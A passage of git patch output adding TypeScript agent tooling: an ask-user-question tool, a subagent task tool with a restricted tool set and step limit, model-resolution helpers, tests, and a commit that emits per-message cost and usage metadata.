+  });
+
+  it("formats `declined: true` as a clear decline message", () => {
+    const result = askUserQuestionTool.toModelOutput!({ declined: true } as never);
+    expect(result).toMatchObject({
+      type: "text",
+      value: expect.stringMatching(/declined to answer/i),
+    });
+  });
+
+  it("formats answered questions as a parseable Q=A summary", () => {
+    const result = askUserQuestionTool.toModelOutput!({
+      answers: {
+        "Which model do you want?": "Haiku",
+        "Which features?": ["Streaming", "Tools"],
+      },
+    } as never);
+    expect(result).toMatchObject({
+      type: "text",
+      value: expect.stringContaining(`"Which model do you want?"="Haiku"`),
+    });
+    expect((result as { value: string }).value).toContain(`"Which features?"="Streaming, Tools"`);
+  });
+});
diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts
new file mode 100644
index 000000000..609037918
--- /dev/null
+++ b/lib/agent/tools/__tests__/taskTool.test.ts
@@ -0,0 +1,146 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { taskTool } from "@/lib/agent/tools/taskTool";
+import { streamText } from "ai";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("ai", async () => {
+  const actual = await vi.importActual<typeof import("ai")>("ai");
+  return { ...actual, streamText: vi.fn() };
+});
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+// `model` is normally attached by `runAgentStep` before the subagent
+// sees the context. The opaque sentinel below is enough for taskTool
+// to pass it into `streamText` — we assert the same instance flows
+// through.
+const mainModel = { __sentinel: "main-model" } as never;
+const subagentModelOverride = { __sentinel: "subagent-model" } as never;
+const ctx = {
+  sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+  model: mainModel,
+};
+
+function makeStreamTextResult(finalText: string) {
+  return {
+    fullStream: (async function* () {
+      // empty — execute only awaits `result.finishReason` + result.response
+    })(),
+    finishReason: Promise.resolve("stop"),
+    response: Promise.resolve({
+      messages: [
+        {
+          role: "assistant",
+          content: [{ type: "text", text: finalText }],
+        },
+      ],
+    }),
+  };
+}
+
+beforeEach(() => {
+  vi.clearAllMocks();
+  vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never);
+});
+
+describe("taskTool.execute", () => {
+  it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never);
+    const result = (await taskTool.execute!(
+      { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; summary: string };
+    expect(result.success).toBe(true);
+    expect(result.summary).toBe("Task done.");
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record<string, unknown>;
+    // system prompt contains task + instructions so the subagent knows its scope
+    expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file"));
+    expect(args.system).toEqual(expect.stringContaining("Use glob and stat"));
+  });
+
+  it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record<string, unknown> };
+    const toolNames = Object.keys(args.tools).sort();
+    expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]);
+    // Critical: NO task (recursion guard) and NO client-side tools.
+    expect(args.tools).not.toHaveProperty("task");
+    expect(args.tools).not.toHaveProperty("ask_user_question");
+    expect(args.tools).not.toHaveProperty("skill");
+    expect(args.tools).not.toHaveProperty("todo_write");
+    expect(args.tools).not.toHaveProperty("web_fetch");
+  });
+
+  it("passes a non-empty prompt so the model has something to act on", async () => {
+    // Regression: a previous version called streamText with `messages: []`,
+    // which caused the AI SDK to throw NoOutputGeneratedError because zero
+    // steps were recorded — the model had a system prompt but no user turn
+    // to respond to. The subagent must receive an explicit user-side trigger.
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as {
+      prompt?: string;
+      messages?: unknown[];
+    };
+    const hasPrompt = typeof args.prompt === "string" && args.prompt.length > 0;
+    const hasMessages = Array.isArray(args.messages) && args.messages.length > 0;
+    expect(hasPrompt || hasMessages).toBe(true);
+  });
+
+  it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
+    expect(args.model).toBe(mainModel);
+  });
+
+  it("prefers `subagentModel` over `model` when both are set on the context", async () => {
+    vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never);
+    await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: { ...ctx, subagentModel: subagentModelOverride },
+    } as never);
+    const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown };
+    expect(args.model).toBe(subagentModelOverride);
+  });
+
+  it("returns success:false when no assistant text is in the response", async () => {
+    vi.mocked(streamText).mockReturnValue({
+      fullStream: (async function* () {})(),
+      finishReason: Promise.resolve("stop"),
+      response: Promise.resolve({ messages: [] }),
+    } as never);
+    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; summary: string };
+    expect(result.success).toBe(false);
+    expect(result.summary).toMatch(/no.*assistant/i);
+  });
+
+  it("returns success:false with a descriptive error when streamText throws", async () => {
+    vi.mocked(streamText).mockImplementation(() => {
+      throw new Error("gateway down");
+    });
+    const result = (await taskTool.execute!({ task: "x", instructions: "y" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/gateway down/);
+  });
+
+  it("throws when agent context is missing the `model` field", async () => {
+    await expect(
+      taskTool.execute!({ task: "x", instructions: "y" }, {
+        experimental_context: { sandbox: ctx.sandbox /* no model */ },
+      } as never),
+    ).rejects.toThrow(/model not initialized/i);
+  });
+});
diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts
new file mode 100644
index 000000000..8d5e1f4ed
--- /dev/null
+++ b/lib/agent/tools/askUserQuestionTool.ts
@@ -0,0 +1,90 @@
+import { tool, type UIToolInvocation } from "ai";
+import { z } from "zod";
+
+const optionSchema = z.object({
+  label: z.string().describe("1-5 words, concise choice text"),
+  description: z.string().describe("Explanation of trade-offs/implications"),
+});
+
+const questionSchema = z.object({
+  question: z.string().describe("The complete question to ask, ends with '?'"),
+  header: z.string().max(12).describe("Short label for tab/chip display"),
+  options: z.array(optionSchema).min(2).max(4),
+  multiSelect: z.boolean().default(false),
+});
+
+export const askUserQuestionInputSchema = z.object({
+  questions: z.array(questionSchema).min(1).max(4),
+});
+
+export type AskUserQuestionInput = z.infer<typeof askUserQuestionInputSchema>;
+
+// Output is filled in by the chat UI after the user answers. Either:
+//   - `{ answers: { [question]: string | string[] } }` — keyed by question text
+//   - `{ declined: true }` — user dismissed the question component
+const answerValueSchema = z.string().or(z.array(z.string()));
+const askUserQuestionOutputSchema = z
+  .object({ answers: z.record(z.string(), answerValueSchema) })
+  .or(z.object({ declined: z.literal(true) }));
+
+export type AskUserQuestionOutput = z.infer<typeof askUserQuestionOutputSchema>;
+
+/**
+ * `ask_user_question` — client-side tool for pausing the agent loop to
+ * collect human input. The model emits a tool-call with the question
+ * schema; `streamText` halts because there's no server `execute`, the
+ * chat UI renders the question UI, collects answers, and submits them
+ * back to the next workflow request as a `tool-output-available` part
+ * inside `messages`. The next workflow turn picks up where this one
+ * left off — no WDK pause/resume hook needed.
+ *
+ * `toModelOutput` formats the (eventual) user answers into a single
+ * text block the model can parse on the next turn.
+ */
+export const askUserQuestionTool = tool({
+  description: `Use this tool when you need to ask the user questions during execution. This allows you to:
+1. Gather user preferences or requirements
+2. Clarify ambiguous instructions
+3. Get decisions on implementation choices as you work
+4. Offer choices to the user about what direction to take.
+
+Usage notes:
+- Users will always be able to select "Other" to provide custom text input
+- Use multiSelect: true to allow multiple answers to be selected for a question
+- If you recommend a specific option, make that the first option in the list and add "(Recommended)" at the end of the label
+- Questions appear as tabs; users navigate between them before submitting`,
+  inputSchema: askUserQuestionInputSchema,
+  outputSchema: askUserQuestionOutputSchema,
+  // NO execute: this is a client-side tool. streamText halts the run after
+  // emitting the tool-call; the chat UI fulfills it asynchronously.
+  toModelOutput: output => {
+    if (!output) {
+      return { type: "text", value: "User did not respond to questions." };
+    }
+
+    if ("declined" in output && output.declined) {
+      return {
+        type: "text",
+        value:
+          "User declined to answer questions. You should continue without this information or ask in a different way.",
+      };
+    }
+
+    if ("answers" in output) {
+      const formatted = Object.entries(output.answers)
+        .map(([question, answer]) => {
+          const value = Array.isArray(answer) ? answer.join(", ") : answer;
+          return `"${question}"="${value}"`;
+        })
+        .join(", ");
+      return {
+        type: "text",
+        value: `User has answered your questions: ${formatted}. You can now continue with the user's answers in mind.`,
+      };
+    }
+
+    return { type: "text", value: "User responded to questions." };
+  },
+});
+
+export type AskUserQuestionToolUIPart = UIToolInvocation<typeof askUserQuestionTool>;
diff --git a/lib/agent/tools/buildSubagentTools.ts b/lib/agent/tools/buildSubagentTools.ts
new file mode 100644
index 000000000..336983252
--- /dev/null
+++ b/lib/agent/tools/buildSubagentTools.ts
@@ -0,0 +1,32 @@
+import { bashTool } from "@/lib/agent/tools/bashTool";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { globTool } from "@/lib/agent/tools/globTool";
+
+/**
+ * Subagent tool set — mirrors open-agents' `executor` subagent
+ * (read/write/edit/grep/glob/bash). Explicitly EXCLUDES the parent
+ * agent's composite + client-side tools:
+ *   - `task` — recursion guard. Subagents are leaves of the agent
+ *     tree; nesting them would bloat traces, double cost per spawn,
+ *     and risk infinite loops.
+ *   - `ask_user_question` — subagents run autonomously without human
+ *     input.
+ *   - `skill` — subagents execute concrete work; skill loading is the
+ *     parent's job.
+ *   - `todo_write` — the parent does the planning.
+ *   - `web_fetch` — parity with open-agents' executor / explorer /
+ *     design subagents, which all omit it.
+ */
+export function buildSubagentTools() {
+  return {
+    bash: bashTool,
+    read: readFileTool,
+    write: writeFileTool,
+    edit: editFileTool,
+    grep: grepTool,
+    glob: globTool,
+  };
+}
diff --git a/lib/agent/tools/getMainModel.ts b/lib/agent/tools/getMainModel.ts
new file mode 100644
index 000000000..961a038b5
--- /dev/null
+++ b/lib/agent/tools/getMainModel.ts
@@ -0,0 +1,26 @@
+import type { LanguageModel } from "ai";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Resolve the main agent's language model from `experimental_context`.
+ * Mirrors open-agents' `getMainModel` (`tools/utils.ts`). Throws with a
+ * descriptive error if the context wasn't populated by `runAgentStep`.
+ *
+ * @param experimental_context - Opaque context object the AI SDK threads
+ *   into tool execute callbacks.
+ * @param toolName - Optional tool name for richer error messages.
+ */
+export function getMainModel(experimental_context: unknown, toolName?: string): LanguageModel {
+  const context = isAgentContext(experimental_context) ? experimental_context : undefined;
+  if (!context?.model) {
+    const toolInfo = toolName ? ` (tool: ${toolName})` : "";
+    const contextInfo = context
+      ? `Context exists but model is missing. Context keys: ${Object.keys(context).join(", ")}`
+      : "Context is undefined or null";
+    throw new Error(
+      `Model not initialized in context${toolInfo}. ${contextInfo}. ` +
+        "Ensure runAgentStep sets experimental_context: { model, ... }",
+    );
+  }
+  return context.model;
+}
diff --git a/lib/agent/tools/getSubagentModel.ts b/lib/agent/tools/getSubagentModel.ts
new file mode 100644
index 000000000..07735485e
--- /dev/null
+++ b/lib/agent/tools/getSubagentModel.ts
@@ -0,0 +1,24 @@
+import type { LanguageModel } from "ai";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Resolve the subagent's language model from `experimental_context`,
+ * falling back to the main agent's model when no dedicated subagent
+ * model is configured. Mirrors open-agents' `getSubagentModel`
+ * (`tools/utils.ts`): `ctx.subagentModel ?? ctx.model`.
+ *
+ * @param experimental_context - Opaque context object the AI SDK threads
+ *   into tool execute callbacks.
+ * @param toolName - Optional tool name for richer error messages.
+ */
+export function getSubagentModel(experimental_context: unknown, toolName?: string): LanguageModel {
+  const context = isAgentContext(experimental_context) ? experimental_context : undefined;
+  if (!context?.model) {
+    const toolInfo = toolName ? ` (tool: ${toolName})` : "";
+    throw new Error(
+      `Model not initialized in context${toolInfo}. ` +
+        "Ensure runAgentStep sets experimental_context: { model, ... }",
+    );
+  }
+  return context.subagentModel ?? context.model;
+}
diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts
new file mode 100644
index 000000000..83381d58f
--- /dev/null
+++ b/lib/agent/tools/taskTool.ts
@@ -0,0 +1,122 @@
+import { streamText, stepCountIs, tool } from "ai";
+import { z } from "zod";
+import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools";
+import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel";
+
+const SUBAGENT_STEP_LIMIT = 30;
+
+const taskInputSchema = z.object({
+  task: z.string().describe("Short description of the task (displayed to user)"),
+  instructions: z
+    .string()
+    .describe(
+      [
+        "Detailed instructions for the subagent. Include:",
+        "- Goal and deliverables",
+        "- Step-by-step procedure",
+        "- Constraints and patterns to follow",
+        "- How to verify the work",
+      ].join("\n"),
+    ),
+});
+
+const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did.
+
+Constraints:
+- Up to ${SUBAGENT_STEP_LIMIT} tool steps total
+- No follow-up questions to the user
+- Stay within the scope described in the task; do not pursue tangents
+- End with a brief plain-text summary (no markdown headings, no bulleted action list — just what you accomplished)`;
+
+/**
+ * `task` — delegate focused, autonomous work to a subagent. The
+ * subagent runs its own `streamText` loop with a curated tool set,
+ * isolated from the parent's conversation history, and returns a
+ * concise summary that the parent can incorporate.
+ *
+ * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single
+ * generic subagent. Streaming progress isn't piped to the UI (the
+ * parent sees one long-running tool call until completion); add an
+ * async-generator execute later if live progress matters.
+ */
+export const taskTool = tool({
+  description: `Launch a subagent to handle complex tasks autonomously.
+
+WHEN TO USE:
+- Clearly-scoped work that can be delegated with explicit instructions
+- Work where focused execution would clutter the main conversation
+- Multi-step exploration / refactoring that you'd otherwise interleave with other turns
+
+WHEN NOT TO USE (do it yourself):
+- Simple, single-file or single-change edits
+- Tasks where you already have all the context you need
+- Ambiguous work that requires back-and-forth clarification
+
+BEHAVIOR:
+- The subagent works AUTONOMOUSLY without asking follow-up questions
+- It runs up to ${SUBAGENT_STEP_LIMIT} tool steps and then returns
+- It returns ONLY a concise summary — internal steps are isolated from the parent
+
+HOW TO USE:
+- Provide a short \`task\` string summarizing the goal (for display)
+- Provide detailed \`instructions\` including goals, steps, constraints, and verification criteria
+
+IMPORTANT:
+- Be explicit and concrete — the subagent cannot ask clarifying questions
+- Include critical context (APIs, function names, file paths) in the instructions
+- The parent agent does not see the subagent's internal tool calls, only its final summary`,
+  inputSchema: taskInputSchema,
+  execute: async ({ task, instructions }, { experimental_context, abortSignal }) => {
+    // Resolves to ctx.subagentModel ?? ctx.model, throwing if context
+    // wasn't populated by runAgentStep. Mirrors open-agents' task tool
+    // (`getSubagentModel(experimental_context, "task")`).
+    const subagentModel = getSubagentModel(experimental_context, "task");
+
+    try {
+      // `prompt` (not `messages: []`) is required — the AI SDK records zero
+      // steps and throws NoOutputGeneratedError if the model has only a
+      // system prompt with no user turn. Mirrors open-agents' task tool.
+      const result = streamText({
+        model: subagentModel,
+        system: `${SUBAGENT_SYSTEM_PROMPT}\n\n## Your Task\n${task}\n\n## Instructions\n${instructions}`,
+        prompt: "Complete this task and provide a summary of what you accomplished.",
+        tools: buildSubagentTools(),
+        stopWhen: stepCountIs(SUBAGENT_STEP_LIMIT),
+        experimental_context,
+        abortSignal,
+      });
+
+      // Drain fullStream so the subagent actually runs to completion.
+      // Streaming progress back to the parent UI is not wired in this slim
+      // port — the parent sees one long-running tool call until the
+      // subagent finishes.
+      for await (const _part of result.fullStream) {
+        void _part;
+      }
+
+      const response = await result.response;
+      const lastAssistant = response.messages.findLast(m => m.role === "assistant");
+      const content = lastAssistant?.content;
+
+      let summary = "";
+      if (typeof content === "string") {
+        summary = content;
+      } else if (Array.isArray(content)) {
+        const lastText = content.findLast(p => p.type === "text");
+        if (lastText && "text" in lastText) summary = lastText.text;
+      }
+
+      if (!summary) {
+        return {
+          success: false,
+          summary: "Subagent finished with no assistant text. The task may be incomplete.",
+        };
+      }
+
+      return { success: true, summary };
+    } catch (error) {
+      const message = error instanceof Error ? error.message : String(error);
+      return { success: false, error: `Subagent failed: ${message}` };
+    }
+  },
+});

From bd67ac7d277fdcc6be77387cfcefe54bf2a666f6 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 18:57:36 -0500
Subject: [PATCH 07/10] feat(chat-workflow): emit per-message cost/usage
 metadata (cutover Bundle C) (#592)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): emit per-message cost/usage metadata (Bundle C)

First step in the open-agents → api cutover sequence. Adds a
messageMetadata callback to runAgentStep's toUIMessageStream call so
the UI receives {modelId, lastStepUsage, totalMessageUsage,
lastStepCost, totalMessageCost, stepFinishReasons} on every assistant
turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte
so sandbox.recoupable.com's model/cost badges keep working when cut
over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of
  open-agents' gateway-metadata.ts, parses gateway-reported per-step
  cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of
  open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring
  open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts —
  stateful factory returning a fresh callback per turn; accumulates
  usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called
this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage

Address PR review feedback (one exported function per file) and adopt
the user's preferred path of upgrading api's `ai` package rather than
maintaining a normalization shim:

- Extract addTokenCounts.ts (used by addLanguageModelUsage)
- Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by
  extractGatewayCost)
- Split AgentStepFinishMetadata into its own file (was co-located
  in AgentMessageMetadata)

Upgrade the AI SDK so the wire format matches open-agents natively:
- ai: 6.0.0-beta.122 → ^6.0.190
- @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai,
  @ai-sdk/mcp: all bumped to latest stable

The new SDK's LanguageModelUsage is the flat shape (top-level
`inputTokens` number + nested `inputTokenDetails`) — identical to
open-agents' wire format. No conversion needed, so:
- Delete normalizeUsage.ts + test (net -82 LOC)
- Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage
  directly)

Production code changes for the SDK upgrade:
- runAgentStep + setupChatRequest: await convertToModelMessages
  (now returns Promise<ModelMessage[]>)

Tests: 3106/3106 pass; production typecheck clean; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 .../workflows/__tests__/runAgentStep.test.ts  | 102 ++++++++
 app/lib/workflows/runAgentStep.ts             |  10 +-
 .../messageMetadata/AgentMessageMetadata.ts   |  29 +++
 .../AgentStepFinishMetadata.ts                |  11 +
 .../GatewayProviderMetadata.ts                |  18 ++
 .../__tests__/addLanguageModelUsage.test.ts   |  49 ++++
 .../__tests__/addTokenCounts.test.ts          |  27 ++
 .../buildMessageMetadataCallback.test.ts      |  93 +++++++
 .../__tests__/extractGatewayCost.test.ts      |  28 +++
 .../__tests__/hasGatewayShape.test.ts         |  25 ++
 .../messageMetadata/addLanguageModelUsage.ts  |  49 ++++
 lib/agent/messageMetadata/addTokenCounts.ts   |  13 +
 .../buildMessageMetadataCallback.ts           |  81 ++++++
 .../messageMetadata/extractGatewayCost.ts     |  20 ++
 lib/agent/messageMetadata/hasGatewayShape.ts  |  18 ++
 lib/chat/setupChatRequest.ts                  |  10 +-
 package.json                                  |  12 +-
 pnpm-lock.yaml                                | 230 +++++-------------
 18 files changed, 648 insertions(+), 177 deletions(-)
 create mode 100644 app/lib/workflows/__tests__/runAgentStep.test.ts
 create mode 100644 lib/agent/messageMetadata/AgentMessageMetadata.ts
 create mode 100644 lib/agent/messageMetadata/AgentStepFinishMetadata.ts
 create mode 100644 lib/agent/messageMetadata/GatewayProviderMetadata.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/addLanguageModelUsage.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/addTokenCounts.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/buildMessageMetadataCallback.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/extractGatewayCost.test.ts
 create mode 100644 lib/agent/messageMetadata/__tests__/hasGatewayShape.test.ts
 create mode 100644 lib/agent/messageMetadata/addLanguageModelUsage.ts
 create mode 100644 lib/agent/messageMetadata/addTokenCounts.ts
 create mode 100644 lib/agent/messageMetadata/buildMessageMetadataCallback.ts
 create mode 100644 lib/agent/messageMetadata/extractGatewayCost.ts
 create mode 100644 lib/agent/messageMetadata/hasGatewayShape.ts

diff --git a/app/lib/workflows/__tests__/runAgentStep.test.ts b/app/lib/workflows/__tests__/runAgentStep.test.ts
new file mode 100644
index 000000000..429a37505
--- /dev/null
+++ b/app/lib/workflows/__tests__/runAgentStep.test.ts
@@ -0,0 +1,102 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { streamText } from "ai";
+import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
+
+vi.mock("ai", async () => {
+  const actual = await vi.importActual<typeof import("ai")>("ai");
+  return { ...actual, streamText: vi.fn() };
+});
+
+// Avoid pulling in real gateway / fetch surface.
+vi.mock("@ai-sdk/gateway", () => ({
+  gateway: vi.fn((modelId: string) => ({ modelId, __mock: "gateway" })),
+}));
+
+function makeStreamResult(opts?: { metadataCalls?: Array<unknown> }) {
+  const calls = opts?.metadataCalls ?? [];
+  return {
+    toUIMessageStream: vi.fn((streamOpts: { messageMetadata?: unknown }) => {
+      // Capture the callback so tests can inspect it
+      calls.push(streamOpts.messageMetadata);
+      return (async function* () {
+        yield { type: "start" };
+        yield { type: "finish" };
+      })();
+    }),
+    finishReason: Promise.resolve("stop"),
+  };
+}
+
+function makeWritable() {
+  const written: unknown[] = [];
+  const stream = new WritableStream({
+    write(chunk) {
+      written.push(chunk);
+    },
+  });
+  return { stream, written };
+}
+
+const baseInput = {
+  messages: [
+    {
+      id: "m1",
+      role: "user" as const,
+      parts: [{ type: "text" as const, text: "hi" }],
+    },
+  ],
+  modelId: "anthropic/claude-haiku-4.5",
+  agentContext: {
+    sandbox: { state: { type: "vercel" }, workingDirectory: "/sandbox/mono" },
+  },
+};
+
+describe("runAgentStep", () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  it("wires a messageMetadata callback into toUIMessageStream", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    expect(captured).toHaveLength(1);
+    expect(typeof captured[0]).toBe("function");
+  });
+
+  it("the wired callback emits modelId on finish-step parts", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    const cb = captured[0] as (args: {
+      part: { type: string; usage?: unknown; finishReason?: string };
+    }) => { modelId?: string } | undefined;
+    const meta = cb({
+      part: {
+        type: "finish-step",
+        usage: { inputTokens: 10, outputTokens: 5 },
+        finishReason: "stop",
+      },
+    });
+    expect(meta).toBeDefined();
+    expect(meta?.modelId).toBe("anthropic/claude-haiku-4.5");
+  });
+
+  it("the wired callback returns undefined for non-finish-step parts", async () => {
+    const captured: unknown[] = [];
+    vi.mocked(streamText).mockReturnValue(makeStreamResult({ metadataCalls: captured }) as never);
+    const { stream } = makeWritable();
+
+    await runAgentStep({ ...baseInput, writable: stream } as never);
+
+    const cb = captured[0] as (args: { part: { type: string } }) => unknown;
+    expect(cb({ part: { type: "text-delta" } })).toBeUndefined();
+    expect(cb({ part: { type: "start" } })).toBeUndefined();
+  });
+});
diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index b487285dc..983bf4d7a 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -4,6 +4,7 @@ import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
 import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
+import { buildMessageMetadataCallback } from "@/lib/agent/messageMetadata/buildMessageMetadataCallback";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
@@ -45,7 +46,7 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
     hasSandboxState: Boolean(input.agentContext.sandbox?.state),
   });
 
-  const modelMessages = convertToModelMessages(input.messages);
+  const modelMessages = await convertToModelMessages(input.messages);
   const tools = buildAgentTools({ skills: input.agentContext.skills });
   // Construct the model here (not in the workflow input) — LanguageModel
   // instances aren't JSON-serializable and can't ride durable inputs.
@@ -69,7 +70,12 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
   // doesn't leak the lock.
   const writer = input.writable.getWriter();
   try {
-    for await (const part of result.toUIMessageStream()) {
+    // `messageMetadata` emits {modelId, usage, cost} chunks the UI
+    // renders as model/cost badges. Mirrors open-agents' chat workflow
+    // shape so sandbox.recoupable.com sees the same metadata when cut
+    // over to api's /api/chat/workflow.
+    const messageMetadata = buildMessageMetadataCallback({ modelId: input.modelId });
+    for await (const part of result.toUIMessageStream({ messageMetadata })) {
       await writer.write(part);
     }
   } finally {
diff --git a/lib/agent/messageMetadata/AgentMessageMetadata.ts b/lib/agent/messageMetadata/AgentMessageMetadata.ts
new file mode 100644
index 000000000..df306c057
--- /dev/null
+++ b/lib/agent/messageMetadata/AgentMessageMetadata.ts
@@ -0,0 +1,29 @@
+import type { FinishReason, LanguageModelUsage } from "ai";
+import type { AgentStepFinishMetadata } from "@/lib/agent/messageMetadata/AgentStepFinishMetadata";
+
+/**
+ * Metadata emitted on each assistant turn via the `messageMetadata`
+ * callback in `runAgentStep`. Mirrors open-agents'
+ * `apps/web/app/types.ts:WebAgentMessageMetadata` byte-for-byte so the
+ * sandbox.recoupable.com UI can render model/cost/usage badges when
+ * cut over to api's `/api/chat/workflow`. Now that api ships
+ * `ai@^6.0.190`, `LanguageModelUsage` is the same flat-shape type
+ * open-agents has been using — no shape conversion needed.
+ */
+export type AgentMessageMetadata = {
+  /** Model the client requested (e.g. user selection in the UI). */
+  selectedModelId?: string;
+  /** Model actually used for the call (may differ from selected under gateway fallback). */
+  modelId?: string;
+  /** Usage from the most recent `finish-step`. */
+  lastStepUsage?: LanguageModelUsage;
+  /** Cumulative usage across every step in this message. */
+  totalMessageUsage?: LanguageModelUsage;
+  /** Gateway-reported cost of the most recent step, in USD. */
+  lastStepCost?: number;
+  /** Cumulative gateway-reported cost across every step of the message, in USD. */
+  totalMessageCost?: number;
+  lastStepFinishReason?: FinishReason;
+  lastStepRawFinishReason?: string;
+  stepFinishReasons?: AgentStepFinishMetadata[];
+};
diff --git a/lib/agent/messageMetadata/AgentStepFinishMetadata.ts b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts
new file mode 100644
index 000000000..4bc618cbd
--- /dev/null
+++ b/lib/agent/messageMetadata/AgentStepFinishMetadata.ts
@@ -0,0 +1,11 @@
+import type { FinishReason } from "ai";
+
+/**
+ * Per-finish-step record kept on the assistant message so the UI can
+ * render a finish-reason history. Mirrors open-agents'
+ * `WebAgentStepFinishMetadata` in `apps/web/app/types.ts`.
+ */
+export type AgentStepFinishMetadata = {
+  finishReason: FinishReason;
+  rawFinishReason?: string;
+};
diff --git a/lib/agent/messageMetadata/GatewayProviderMetadata.ts b/lib/agent/messageMetadata/GatewayProviderMetadata.ts
new file mode 100644
index 000000000..0c10c954a
--- /dev/null
+++ b/lib/agent/messageMetadata/GatewayProviderMetadata.ts
@@ -0,0 +1,18 @@
+/**
+ * Shape of the Vercel AI Gateway entry in `providerMetadata`.
+ * Mirrors open-agents' `apps/web/app/workflows/gateway-metadata.ts`.
+ *
+ * The gateway surfaces per-step cost information alongside routing
+ * diagnostics. We only consume the `cost` field; other fields are
+ * documented for reference and forward-compat.
+ */
